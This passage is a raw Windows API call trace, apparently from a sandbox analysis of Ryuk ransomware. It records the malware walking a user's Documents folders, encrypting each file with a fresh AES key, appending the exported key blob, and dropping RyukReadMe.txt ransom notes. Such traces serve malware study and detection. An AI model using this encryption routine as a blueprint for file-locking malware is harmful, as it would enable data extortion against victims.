0x2760000 [0153.054] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.054] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0xfe52, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0xfe52, lpOverlapped=0x0) returned 1 [0153.055] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0153.055] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0xfe52, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0xfe60) returned 1 [0153.056] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.056] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xfe60, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0xfe60, lpOverlapped=0x0) returned 1 [0153.056] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0153.056] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0153.056] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0153.056] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0153.056] CloseHandle (hObject=0x194) returned 1 [0153.090] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0153.094] CryptDestroyKey (hKey=0x3b8690) returned 1 [0153.094] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0153.094] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0153.095] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0153.095] SetLastError (dwErrCode=0x0) [0153.095] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\cvEFXzrwu0\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\njmximp-kwrpjhp3k\\cvefxzrwu0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0153.095] GetLastError () returned 0x0 [0153.095] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0153.096] CloseHandle (hObject=0x190) returned 1 [0153.096] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0153.096] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0153.096] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\GZJInAZrS2AEvK.doc", dwFileAttributes=0x80) returned 1 [0153.096] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\GZJInAZrS2AEvK.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\njmximp-kwrpjhp3k\\gzjinazrs2aevk.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0153.097] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=96041) returned 1 [0153.097] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=96041) returned 1 [0153.097] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x17607, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.097] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0153.098] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.098] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0153.098] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0153.098] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.098] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x17729, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x17729, lpOverlapped=0x0) returned 1 [0153.099] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0153.099] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x17729, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x17730) returned 1 [0153.100] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.100] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x17730, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x17730, lpOverlapped=0x0) returned 1 [0153.100] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0153.100] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0153.100] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0153.100] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0153.100] CloseHandle (hObject=0x190) returned 1 [0153.127] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0153.170] CryptDestroyKey (hKey=0x3b8690) returned 1 [0153.170] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0153.170] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0153.170] SetLastError (dwErrCode=0x0) [0153.170] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\njmximp-kwrpjhp3k\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0153.170] GetLastError () returned 0xb7 [0153.170] CloseHandle (hObject=0x190) returned 1 [0153.170] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0153.170] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0153.170] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0153.170] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0153.170] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\G9jHHoBjHcZ WZOEc.xls", dwFileAttributes=0x80) returned 1 [0153.171] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\G9jHHoBjHcZ WZOEc.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\njmximp-kwrpjhp3k\\hravzqb\\g9jhhobjhcz wzoec.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0153.171] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=19815) returned 1 [0153.171] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=19815) returned 1 [0153.171] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x4c45, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.171] ReadFile (in: hFile=0x194, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0153.171] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.172] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0153.172] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0153.172] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.172] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0x4d67, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0x4d67, lpOverlapped=0x0) returned 1 [0153.172] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0153.172] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x4d67, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x4d70) returned 1 [0153.172] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.172] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x4d70, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0x4d70, lpOverlapped=0x0) returned 1 [0153.172] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0153.172] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0153.173] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0153.173] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0153.173] CloseHandle (hObject=0x194) returned 1 [0153.189] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0153.193] CryptDestroyKey (hKey=0x3b8690) returned 1 [0153.193] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0153.193] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0153.193] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0153.193] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\lgi-DcpK9rROvq12vj.pps", dwFileAttributes=0x80) returned 1 [0153.194] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\lgi-DcpK9rROvq12vj.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\njmximp-kwrpjhp3k\\hravzqb\\lgi-dcpk9rrovq12vj.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0153.194] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=91894) returned 1 [0153.194] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=91894) returned 1 [0153.194] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x165d4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.194] ReadFile (in: hFile=0x194, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0153.195] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.195] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0153.195] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0153.195] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.195] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0x166f6, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0x166f6, lpOverlapped=0x0) returned 1 [0153.196] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0153.196] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x166f6, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x16700) returned 1 [0153.197] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.197] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x16700, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0x16700, lpOverlapped=0x0) returned 1 [0153.197] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0153.197] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0153.197] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0153.197] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0153.197] CloseHandle (hObject=0x194) returned 1 [0153.390] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0153.394] CryptDestroyKey (hKey=0x3b8690) returned 1 [0153.394] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0153.394] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0153.394] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0153.394] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\Mgde_ADlrJGf.csv", dwFileAttributes=0x80) returned 1 [0153.394] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\Mgde_ADlrJGf.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\njmximp-kwrpjhp3k\\hravzqb\\mgde_adlrjgf.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0153.395] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=92200) returned 1 [0153.395] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=92200) returned 1 [0153.395] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x16706, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.395] ReadFile (in: hFile=0x194, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0153.395] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.395] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0153.395] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0153.395] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.396] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0x16828, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0x16828, lpOverlapped=0x0) returned 1 [0153.397] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0153.397] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x16828, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x16830) returned 1 [0153.397] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.397] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x16830, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0x16830, lpOverlapped=0x0) returned 1 [0153.398] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0153.398] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0153.398] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0153.398] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0153.398] CloseHandle (hObject=0x194) returned 1 [0153.412] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0153.416] CryptDestroyKey (hKey=0x3b8690) returned 1 [0153.416] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0153.416] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0153.416] SetLastError (dwErrCode=0x0) [0153.416] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\njmximp-kwrpjhp3k\\hravzqb\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0153.416] GetLastError () returned 0x0 [0153.416] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0153.417] CloseHandle (hObject=0x194) returned 1 [0153.417] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\Wv Aiw0iUZuvy0\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0153.417] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0153.417] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0153.417] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0153.418] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\Wv Aiw0iUZuvy0\\4-Hxti1.ods", dwFileAttributes=0x80) returned 1 [0153.418] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\Wv Aiw0iUZuvy0\\4-Hxti1.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\njmximp-kwrpjhp3k\\hravzqb\\wv aiw0iuzuvy0\\4-hxti1.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0153.418] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=76808) returned 1 [0153.418] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=76808) returned 1 [0153.418] SetFilePointerEx (in: hFile=0x198, 